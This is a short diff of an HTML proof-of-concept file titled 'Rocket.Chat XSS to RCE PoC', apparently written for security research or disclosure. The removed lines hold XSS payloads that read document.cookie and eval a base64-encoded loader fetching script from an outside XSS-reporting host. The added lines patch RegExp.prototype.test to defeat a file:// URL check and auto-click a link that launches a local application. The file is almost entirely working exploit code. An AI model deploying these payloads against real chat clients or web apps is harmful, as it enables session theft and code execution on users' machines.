--- a/boom.html
+++ b/boom.html
@@ -1,17 +1,24 @@
 <!DOCTYPE html>
 <html>
-<head>
-    <meta charset="utf-8"/>
-    <meta name="viewport" content="width=device-width, initial-scale=1"/>
-    <title>Test Upload File</title>
-</head>
-<body>
-    <br><BR><BR><BR>
-<h1>pwn<br>
-"><img src=x onerror=prompt(document.cookie)>
-
-    <a href=javaSCRIPT&colon;alert(window.origin)>boom</a>
-
-"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2Jvb202NzAiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
-</body>
+    <head>
+      <script>
+        RegExp.prototype.test = new Proxy(RegExp.prototype.test, {
+          apply: function(target, thisArg, argumentsList) {
+          if((thisArg.source == '^file:\\/\\/.+') && (argumentsList[0] === 'file:///System/Applications/Calculator.app/')){
+            return false;
+          }
+          return Reflect.apply(target, thisArg, argumentsList)
+          }
+        });
+        setTimeout(()=>{
+            a = document.createElement("a")
+            a.href="file:///System/Applications/Calculator.app/"
+            document.body.appendChild(a)
+            a.click()
+        }, 3000);
+      </script>
+    </head>
+    <body>
+     <h1>Rocket.Chat XSS to RCE PoC</h1>
+    </body>
 </html>
